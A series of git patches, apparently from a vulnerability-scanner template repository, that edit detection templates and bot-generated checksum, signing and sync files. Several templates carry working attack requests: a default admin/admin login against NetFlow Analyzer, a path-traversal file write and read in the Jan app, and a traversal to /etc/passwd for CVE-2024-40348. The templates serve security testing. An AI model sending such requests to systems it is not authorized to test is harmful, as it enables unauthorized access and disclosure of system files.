.../netflow/netflow-default-login.yaml | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/http/default-logins/netflow/netflow-default-login.yaml b/http/default-logins/netflow/netflow-default-login.yaml index 82154b50f9..b76a1f5be2 100644 --- a/http/default-logins/netflow/netflow-default-login.yaml +++ b/http/default-logins/netflow/netflow-default-login.yaml @@ -7,26 +7,27 @@ info: description: | Netflow Analyzer default login was discovered. metadata: - shodan-query: html:"Login - Netflow Analyzer" verified: true max-request: 1 - tags: default-login,netflow - -variables: - username: "admin" - password: "admin" + shodan-query: html:"Login - Netflow Analyzer" + tags: default-login,netflow,misconfig http: - raw: - | POST /netflow/jspui/j_security_check HTTP/1.1 Host: {{Hostname}} - Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded - Referer: {{RootURL}}/netflow/jspui/NetworkSnapShot.jsp radiusUserEnabled=false&AUTHRULE_NAME=Authenticator&j_username={{username}}&j_password={{password}}&Submit=Login + attack: pitchfork + payloads: + username: + - admin + password: + - admin + matchers-condition: and matchers: - type: word @@ -37,6 +38,6 @@ http: condition: or - type: word - part: header + part: location words: - "/netflow;jsessionid" From d784b75281f333a06d2dbf62dc72abaf29815e40 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Jul 2024 12:38:56 +0530 Subject: [PATCH 1530/1841] Update jan-file-upload.yaml --- http/vulnerabilities/other/jan-file-upload.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/http/vulnerabilities/other/jan-file-upload.yaml b/http/vulnerabilities/other/jan-file-upload.yaml index 9f82cb2e4f..a9cce04f60 100644 --- a/http/vulnerabilities/other/jan-file-upload.yaml +++ b/http/vulnerabilities/other/jan-file-upload.yaml @@ -20,10 +20,10 @@ variables: http: - raw: - | - POST /v1/app/appendFileSync HTTP/1.1 + POST /v1/app/writeFileSync HTTP/1.1 Host: {{Hostname}} - Referer: {{RootURL}} contentType: application/json + Content-Type: text/plain;charset=UTF-8 Origin: {{RootURL}} ["/../../../../../tmp/{{string}}.txt","{{randstr}}"] @@ -31,7 +31,6 @@ http: - | POST /v1/app/readFileSync HTTP/1.1 Host: {{Hostname}} - Referer: {{RootURL}} contentType: application/json Content-Type: text/plain;charset=UTF-8 Origin: {{RootURL}} From ec3cb319a8138c7352161cc63cf5d566274d983d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 23 Jul 2024 07:10:25 +0000 Subject: [PATCH 1531/1841] Auto Generated New Template Addition List [Tue Jul 23 07:10:25 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5ff47fcf6e..5bea761c0a 100644 --- a/.new-additions +++ b/.new-additions @@ -21,6 +21,7 @@ http/cves/2024/CVE-2024-6289.yaml http/cves/2024/CVE-2024-6646.yaml http/default-logins/deluge/deluge-default-login.yaml http/default-logins/gitblit/gitblit-default-login.yaml +http/default-logins/netflow/netflow-default-login.yaml http/exposed-panels/adguard-panel.yaml http/exposed-panels/falcosidekick-panel.yaml http/exposed-panels/freshrss-panel.yaml From 0f2e8108a4316a9a8a7248786db3a0f665c833e5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 07:10:34 +0000 Subject: [PATCH 1532/1841] Auto Generated Templates Checksum [Tue Jul 23 07:10:34 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a7171bca66..f2cd15e424 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3631,6 +3631,7 @@ http/default-logins/mofi/mofi4500-default-login.yaml:506eeab67f08aebd2f946b5c253 http/default-logins/nacos/nacos-default-login.yaml:489f794fa8d86511bf97ce5b2b9f92dcd3dd30d8 http/default-logins/nagios/nagios-default-login.yaml:5be447e727ec6ec2763d2ffb167419587ceb9bc9 http/default-logins/nagios/nagiosxi-default-login.yaml:60ae84bfb173f6a3851c97e22fb4cbab0b540c6f +http/default-logins/netflow/netflow-default-login.yaml:a37a0281201bbedae3e502e876f61b216d664eea http/default-logins/netsus/netsus-default-login.yaml:8979ce668c655546a5ab1ae6252ccca18f7da07a http/default-logins/next-terminal/next-terminal-default-login.yaml:9196f6d907ad55ef9dcff52207e37dd6d0f06c76 http/default-logins/nexus/nexus-default-login.yaml:8041be21504ba54971e8b36ab505890e8117bece @@ -5947,7 +5948,7 @@ http/misconfiguration/server-status.yaml:0fbfb6c7b6e541aade005e601c0a5d83acdfe20 http/misconfiguration/service-pwd.yaml:625117d7929ae17d0cf02bb5b4e9fefee1ca36b9 http/misconfiguration/servicenow-title-injection.yaml:6e2f091a40860419e5be19393caf23c1ef608ffa http/misconfiguration/servicenow-widget-misconfig.yaml:7946ba306bf6bdea013874dd95b68cab9c106c7b -http/misconfiguration/sftpgo-admin-setup.yaml:c5ee25008c1a96d8bad2a677603f33473545eca1 +http/misconfiguration/sftpgo-admin-setup.yaml:bd9a286e70f92bbda9556f085515a296cb9f6bef http/misconfiguration/shell-history.yaml:ef801bc0a0ded3159e0d15422845a35286b269e0 http/misconfiguration/sitecore-debug-page.yaml:2934b7c26a571f8a4c2f13a9bd99059a5c4e974d http/misconfiguration/sitecore-lfi.yaml:1a0abe7d31d65b931c8e017a94fecc7e3086333c @@ -8911,7 +8912,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6d16f82dfcc20d4803ce8a7f93fb841a73001ec4 +templates-checksum.txt:e6dea3b85ab57239253a50ead607f2bcd488d81f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 9eedf470f1b78a19b5ae82dd876632924c7eeee3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 23 Jul 2024 07:11:12 +0000 Subject: [PATCH 1533/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ab39977fc4..75552036b4 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -26,6 +26,7 @@ on: - 'http/cves/2024/CVE-2024-6646.yaml' - 'http/default-logins/deluge/deluge-default-login.yaml' - 'http/default-logins/gitblit/gitblit-default-login.yaml' + - 'http/default-logins/netflow/netflow-default-login.yaml' - 'http/exposed-panels/adguard-panel.yaml' - 'http/exposed-panels/falcosidekick-panel.yaml' - 'http/exposed-panels/freshrss-panel.yaml' From e3bcf513835a9c394028e3edf5efc5d3e8bced5d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 23 Jul 2024 07:11:28 +0000 Subject: [PATCH 1534/1841] Auto Generated New Template Addition List [Tue Jul 23 07:11:28 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5bea761c0a..51ea50c4f7 100644 --- a/.new-additions +++ b/.new-additions @@ -46,4 +46,5 @@ http/vulnerabilities/other/lvs-download-lfi.yaml http/vulnerabilities/other/ncast-lfi.yaml http/vulnerabilities/other/wifisky7-rce.yaml network/cves/2024/CVE-2024-6746.yaml +vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml workflows/nacos-workflow.yaml From 474f264e465c1825ccac75e96eefa34d3003560d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 07:11:37 +0000 Subject: [PATCH 1535/1841] Auto Generated Templates Checksum [Tue Jul 23 07:11:37 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f2cd15e424..513437dc57 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3880,7 +3880,7 @@ http/exposed-panels/ccm-detect.yaml:c892c2b022ca3f90766f62aa90e60bc5e9179871 http/exposed-panels/centreon-panel.yaml:e53d271aa40bfd5135b196c539cfac08d9883f54 http/exposed-panels/cerebro-panel.yaml:708680b790390c4246d766d676c794b797dbbdfd http/exposed-panels/changedetection-panel.yaml:4015a2f8bf61738b1f61e5f333c61857c9b4b055 -http/exposed-panels/checkmk/checkmarx-panel.yaml:debe9bcf72dc5ba4a64bdb335abac742d2f536d9 +http/exposed-panels/checkmk/checkmarx-panel.yaml:e95d8bd2f9b4b79170773e27538f6ccf7076e3ae http/exposed-panels/checkmk/checkmk-login.yaml:89b61f834b7515d5463b1b2703e6cf6e93cd47e6 http/exposed-panels/checkpoint/ssl-network-extender.yaml:acf6964397f11415d6b76a72cd3fe70776a5094c http/exposed-panels/checkpoint-panel.yaml:3e10faa7a34f4dbcbc2819361e5276b4b340f1b2 @@ -8912,7 +8912,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e6dea3b85ab57239253a50ead607f2bcd488d81f +templates-checksum.txt:42503a76a627b6c2fa9cb6f872fad2f40b9f9697 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3267afeba91a499af07f131641c6c868134d36a0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 23 Jul 2024 07:11:49 +0000 Subject: [PATCH 1536/1841] Auto Generated New Template Addition List [Tue Jul 23 07:11:49 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 51ea50c4f7..9be17852f0 100644 --- a/.new-additions +++ b/.new-additions @@ -42,6 +42,7 @@ http/technologies/wordpress/plugins/fluent-smtp.yaml http/technologies/wordpress/plugins/wp-crontrol.yaml http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml +http/vulnerabilities/other/jan-file-upload.yaml http/vulnerabilities/other/lvs-download-lfi.yaml http/vulnerabilities/other/ncast-lfi.yaml http/vulnerabilities/other/wifisky7-rce.yaml From 4a2505592ba8817411c28ddf11d0932b6f4b60e3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 07:12:13 +0000 Subject: [PATCH 1538/1841] Auto Template Signing [Tue Jul 23 07:12:13 UTC 2024] :robot: --- http/default-logins/netflow/netflow-default-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/default-logins/netflow/netflow-default-login.yaml b/http/default-logins/netflow/netflow-default-login.yaml index b76a1f5be2..e7c747cdc2 100644 --- a/http/default-logins/netflow/netflow-default-login.yaml +++ b/http/default-logins/netflow/netflow-default-login.yaml @@ -41,3 +41,4 @@ http: part: location words: - "/netflow;jsessionid" +# digest: 4b0a00483046022100a6e60cf558d5d6383bae690c8c770dbe0656def6cd80d1ddb7dfa85fe6ed1798022100d4981c561c132ddd0fab88f05be6f7d771c891e7958877ee6bcdf6725f637729:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e8943172819484baf70e8688c21216d1a736ce0f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 23 Jul 2024 07:12:27 +0000 Subject: [PATCH 1539/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 75552036b4..6abf5975a2 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -51,6 +51,7 @@ on: - 'http/vulnerabilities/other/ncast-lfi.yaml' - 'http/vulnerabilities/other/wifisky7-rce.yaml' - 'network/cves/2024/CVE-2024-6746.yaml' + - 'vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml' - 'workflows/nacos-workflow.yaml' workflow_dispatch: jobs: From 4db4618debdbd3668ca597dc18a3e2dd35390c3c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 23 Jul 2024 07:12:38 +0000 Subject: [PATCH 1540/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 6abf5975a2..5d437473be 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -47,6 +47,7 @@ on: - 'http/technologies/wordpress/plugins/wp-crontrol.yaml' - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' - 'http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml' + - 'http/vulnerabilities/other/jan-file-upload.yaml' - 'http/vulnerabilities/other/lvs-download-lfi.yaml' - 'http/vulnerabilities/other/ncast-lfi.yaml' - 'http/vulnerabilities/other/wifisky7-rce.yaml' From 9c1e7f15e313da21c98d1ef4ed5eb800758b247e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Jul 2024 12:46:49 +0530 Subject: [PATCH 1541/1841] Update mongod-exposure.yaml --- http/misconfiguration/mongod-exposure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/mongod-exposure.yaml b/http/misconfiguration/mongod-exposure.yaml index 9b52d7c7bb..63f31023e3 100644 --- a/http/misconfiguration/mongod-exposure.yaml +++ b/http/misconfiguration/mongod-exposure.yaml @@ -3,7 +3,7 @@ id: mongod-exposure info: name: MongoD Server - Exposure author: DhiyaneshDk - severity: medium + severity: low metadata: verified: true max-request: 1 From 9396a830568f049d18895e0bfe797862287e8efd Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Jul 2024 12:50:21 +0530 Subject: [PATCH 1542/1841] updated matchers --- http/cves/2024/CVE-2024-40348.yaml | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/http/cves/2024/CVE-2024-40348.yaml b/http/cves/2024/CVE-2024-40348.yaml index ab6c6d46c8..9cfe50f590 100644 --- a/http/cves/2024/CVE-2024-40348.yaml +++ b/http/cves/2024/CVE-2024-40348.yaml @@ -14,6 +14,8 @@ info: epss-score: 0.00043 epss-percentile: 0.09329 metadata: + verified: true + max-request: 2 vendor: morpheus65535 product: bazarr fofa-query: title=="Bazarr" && icon_hash="-1983413099" @@ -22,21 +24,23 @@ info: flow: http(1) && http(2) http: - - raw: - - | - GET /login HTTP/1.1 + - method: GET + path: + - "{{BaseURL}}/login" matchers: - type: word part: body words: - 'Bazarr' + - 'content="Bazarr' + - 'window.Bazarr' + condition: or internal: true - - raw: - - | - GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: From a387382274b379dcbbee7e30a647fc0fc520b0a4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 23 Jul 2024 07:20:56 +0000 Subject: [PATCH 1543/1841] Auto Generated New Template Addition List [Tue Jul 23 07:20:55 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9be17852f0..b0119fca9f 100644 --- a/.new-additions +++ b/.new-additions @@ -35,6 +35,7 @@ http/exposures/files/adcs-certificate.yaml http/misconfiguration/freshrss-unauth.yaml http/misconfiguration/installer/adguard-installer.yaml http/misconfiguration/installer/freshrss-installer.yaml +http/misconfiguration/mongod-exposure.yaml http/misconfiguration/servicenow-title-injection.yaml http/misconfiguration/sftpgo-admin-setup.yaml http/technologies/apache/apache-ozone-detect.yaml From edd751b3a118f5ae53ded4c2cfb42d7b793d79a8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 07:21:01 +0000 Subject: [PATCH 1544/1841] Auto Generated Templates Checksum [Tue Jul 23 07:21:01 UTC 2024] :robot: --- templates-checksum.txt | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 513437dc57..c138101be6 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3631,7 +3631,7 @@ http/default-logins/mofi/mofi4500-default-login.yaml:506eeab67f08aebd2f946b5c253 http/default-logins/nacos/nacos-default-login.yaml:489f794fa8d86511bf97ce5b2b9f92dcd3dd30d8 http/default-logins/nagios/nagios-default-login.yaml:5be447e727ec6ec2763d2ffb167419587ceb9bc9 http/default-logins/nagios/nagiosxi-default-login.yaml:60ae84bfb173f6a3851c97e22fb4cbab0b540c6f -http/default-logins/netflow/netflow-default-login.yaml:a37a0281201bbedae3e502e876f61b216d664eea +http/default-logins/netflow/netflow-default-login.yaml:9b75ed8f339e30319ecbeea7db960eac60b53ddb http/default-logins/netsus/netsus-default-login.yaml:8979ce668c655546a5ab1ae6252ccca18f7da07a http/default-logins/next-terminal/next-terminal-default-login.yaml:9196f6d907ad55ef9dcff52207e37dd6d0f06c76 http/default-logins/nexus/nexus-default-login.yaml:8041be21504ba54971e8b36ab505890e8117bece @@ -5860,6 +5860,7 @@ http/misconfiguration/mlflow-unauth.yaml:782c87a81f600d3dd2782e60f63080d361abbb9 http/misconfiguration/mobiproxy-dashboard.yaml:4d76a953ef877f0847e2722091d679b905023cc8 http/misconfiguration/mobsf-framework-exposure.yaml:92bdcbddf11b0820a1a4bfefbf5eabe0f9497fab http/misconfiguration/moleculer-microservices.yaml:0d01170ea7ef5498c0c8a7f9dfa1e0b40eb6810c +http/misconfiguration/mongod-exposure.yaml:8d3ad079e152275ec500ab9a07a9c8c03f9e1d61 http/misconfiguration/mongodb-exporter-metrics.yaml:7b7e5d390758a4c2de26b7dbf332619dd2db9bbb http/misconfiguration/ms-exchange-user-enum.yaml:844709108afd1659791b731226dc62a75954eb5a http/misconfiguration/multilaser-pro-setup.yaml:6b10ca82ce94dd55a2b28df9cc37d5d9e5fb2951 @@ -8114,6 +8115,7 @@ http/vulnerabilities/other/icewarp-webclient-rce.yaml:bf387ae5e45135b872e69d2cf1 http/vulnerabilities/other/indonasia-toko-cms-sql.yaml:a4ae4322271341d2153f07c51747876b704f1bf4 http/vulnerabilities/other/inspur-clusterengine-rce.yaml:3dcfa246854ab35fea28a9af31fd52c102672dd0 http/vulnerabilities/other/interlib-fileread.yaml:3445c93055a5b98d53d8c6d9e10a408f51e8753f +http/vulnerabilities/other/jan-file-upload.yaml:299d6f217e232724e3a9438af8347e4ca4d7bbc8 http/vulnerabilities/other/java-melody-xss.yaml:05dfd2b795e58f096c6f9312736d863ca73a6e6e http/vulnerabilities/other/jeewms-lfi.yaml:b5a932db2e83beca026f5331c031c4aaa9eea8aa http/vulnerabilities/other/jfrog-unauth-build-exposed.yaml:347b7aaa0256e9abdf47a0ba8705a3e023a6f56b @@ -8912,7 +8914,8 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:42503a76a627b6c2fa9cb6f872fad2f40b9f9697 +templates-checksum.txt:ed1b9a1d956dbe0f08695a6b87f1b4afb7eee9a6 +vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:2c06bdccd041b6b7afcdce490573ee5c1d255b0f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 01b3bb11cad228deaee64306fa4c4877e56f03ce Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 23 Jul 2024 07:22:08 +0000 Subject: [PATCH 1545/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 5d437473be..c5942a47d5 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -40,6 +40,7 @@ on: - 'http/misconfiguration/freshrss-unauth.yaml' - 'http/misconfiguration/installer/adguard-installer.yaml' - 'http/misconfiguration/installer/freshrss-installer.yaml' + - 'http/misconfiguration/mongod-exposure.yaml' - 'http/misconfiguration/servicenow-title-injection.yaml' - 'http/misconfiguration/sftpgo-admin-setup.yaml' - 'http/technologies/apache/apache-ozone-detect.yaml' From 30277b82a0ad524003b275ac5dd993253bda5408 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 07:22:41 +0000 Subject: [PATCH 1546/1841] Auto Template Signing [Tue Jul 23 07:22:41 UTC 2024] :robot: --- http/exposed-panels/checkmk/checkmarx-panel.yaml | 1 + http/misconfiguration/mongod-exposure.yaml | 1 + http/vulnerabilities/other/jan-file-upload.yaml | 1 + vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml | 1 + 4 files changed, 4 insertions(+) diff --git a/http/exposed-panels/checkmk/checkmarx-panel.yaml b/http/exposed-panels/checkmk/checkmarx-panel.yaml index 2c47d6ed1d..1ba421973c 100644 --- a/http/exposed-panels/checkmk/checkmarx-panel.yaml +++ b/http/exposed-panels/checkmk/checkmarx-panel.yaml @@ -38,3 +38,4 @@ http: group: 1 regex: - '(?i)"version":\s*"([0-9.]+)"' +# digest: 490a004630440220765610543648ce38d9b664a9eaa311c7d754d1c2c169250cc5793ba1c62ac9fa02206ed7ce3863cd4d80db3566ae3f47a2b0b0d76a8a86f073cd1aac082687cd211a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/mongod-exposure.yaml b/http/misconfiguration/mongod-exposure.yaml index 63f31023e3..cca6607021 100644 --- a/http/misconfiguration/mongod-exposure.yaml +++ b/http/misconfiguration/mongod-exposure.yaml @@ -28,3 +28,4 @@ http: - type: status status: - 200 +# digest: 4a0a004730450221008fe15b8f67398c3d37ad238f27498ac2e8c59e4a3e919cdb65ec15d078ab58da02207bb1fb40632fdbe0809a030f18072ad0f10b4774a13b7f443a817037fb4ca50d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/jan-file-upload.yaml b/http/vulnerabilities/other/jan-file-upload.yaml index a9cce04f60..0421e51460 100644 --- a/http/vulnerabilities/other/jan-file-upload.yaml +++ b/http/vulnerabilities/other/jan-file-upload.yaml @@ -47,3 +47,4 @@ http: - type: status status: - 200 +# digest: 4a0a004730450220588386f232e7fd1b2d944debc86e55c0ab9a3b987ab46344021ca95eb4a20148022100cc9ba34700beeebf9427f7d63787d562143f34baf764c1d22f93442c9b932c1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml b/vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml index 2bda8e88e3..25b46f4b07 100644 --- a/vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml +++ b/vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml @@ -41,3 +41,4 @@ http: - type: dsl dsl: - "status_2 == 200" +# digest: 4b0a00483046022100f8d2dcd7ab599a92095428ff31bc7a4a3c09befacc814c2804ca8ff7a0a62635022100d876802d930054655ca2299f666120809dfd8976e6a6c5f4992c3ec715be665a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 89232860073f57c41e48095d1b618e46245c06ee Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 07:23:56 +0000 Subject: [PATCH 1547/1841] Auto Generated Templates Checksum [Tue Jul 23 07:23:56 UTC 2024] :robot: --- templates-checksum.txt | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c138101be6..48242fe405 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3498,6 +3498,7 @@ http/cves/2024/CVE-2024-3742.yaml:c14a1c00e621d1d77ddf978af6680fc4b05c3aa1 http/cves/2024/CVE-2024-37881.yaml:060af3bf51e4ab05684d4923658d02b3c49583bb http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 +http/cves/2024/CVE-2024-40348.yaml:621751d6dddccf70558e2ce83afae2b1af41a249 http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 http/cves/2024/CVE-2024-4257.yaml:76768a186c284a20129bc8f67a2c620f8c1fc7ac http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 @@ -3880,7 +3881,7 @@ http/exposed-panels/ccm-detect.yaml:c892c2b022ca3f90766f62aa90e60bc5e9179871 http/exposed-panels/centreon-panel.yaml:e53d271aa40bfd5135b196c539cfac08d9883f54 http/exposed-panels/cerebro-panel.yaml:708680b790390c4246d766d676c794b797dbbdfd http/exposed-panels/changedetection-panel.yaml:4015a2f8bf61738b1f61e5f333c61857c9b4b055 -http/exposed-panels/checkmk/checkmarx-panel.yaml:e95d8bd2f9b4b79170773e27538f6ccf7076e3ae +http/exposed-panels/checkmk/checkmarx-panel.yaml:bee447d37f57d7735a7c1376e53264f7eb670ab8 http/exposed-panels/checkmk/checkmk-login.yaml:89b61f834b7515d5463b1b2703e6cf6e93cd47e6 http/exposed-panels/checkpoint/ssl-network-extender.yaml:acf6964397f11415d6b76a72cd3fe70776a5094c http/exposed-panels/checkpoint-panel.yaml:3e10faa7a34f4dbcbc2819361e5276b4b340f1b2 @@ -5860,7 +5861,7 @@ http/misconfiguration/mlflow-unauth.yaml:782c87a81f600d3dd2782e60f63080d361abbb9 http/misconfiguration/mobiproxy-dashboard.yaml:4d76a953ef877f0847e2722091d679b905023cc8 http/misconfiguration/mobsf-framework-exposure.yaml:92bdcbddf11b0820a1a4bfefbf5eabe0f9497fab http/misconfiguration/moleculer-microservices.yaml:0d01170ea7ef5498c0c8a7f9dfa1e0b40eb6810c -http/misconfiguration/mongod-exposure.yaml:8d3ad079e152275ec500ab9a07a9c8c03f9e1d61 +http/misconfiguration/mongod-exposure.yaml:a1ddfdd5af2619c13de38d14dd69abeac483c7a3 http/misconfiguration/mongodb-exporter-metrics.yaml:7b7e5d390758a4c2de26b7dbf332619dd2db9bbb http/misconfiguration/ms-exchange-user-enum.yaml:844709108afd1659791b731226dc62a75954eb5a http/misconfiguration/multilaser-pro-setup.yaml:6b10ca82ce94dd55a2b28df9cc37d5d9e5fb2951 @@ -8115,7 +8116,7 @@ http/vulnerabilities/other/icewarp-webclient-rce.yaml:bf387ae5e45135b872e69d2cf1 http/vulnerabilities/other/indonasia-toko-cms-sql.yaml:a4ae4322271341d2153f07c51747876b704f1bf4 http/vulnerabilities/other/inspur-clusterengine-rce.yaml:3dcfa246854ab35fea28a9af31fd52c102672dd0 http/vulnerabilities/other/interlib-fileread.yaml:3445c93055a5b98d53d8c6d9e10a408f51e8753f -http/vulnerabilities/other/jan-file-upload.yaml:299d6f217e232724e3a9438af8347e4ca4d7bbc8 +http/vulnerabilities/other/jan-file-upload.yaml:fb1229176f007981856f73faf9a36fea755c3de5 http/vulnerabilities/other/java-melody-xss.yaml:05dfd2b795e58f096c6f9312736d863ca73a6e6e http/vulnerabilities/other/jeewms-lfi.yaml:b5a932db2e83beca026f5331c031c4aaa9eea8aa http/vulnerabilities/other/jfrog-unauth-build-exposed.yaml:347b7aaa0256e9abdf47a0ba8705a3e023a6f56b @@ -8914,8 +8915,8 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ed1b9a1d956dbe0f08695a6b87f1b4afb7eee9a6 -vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:2c06bdccd041b6b7afcdce490573ee5c1d255b0f +templates-checksum.txt:9c506582978b64b1623e6c9428e3337cd727eee4 +vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 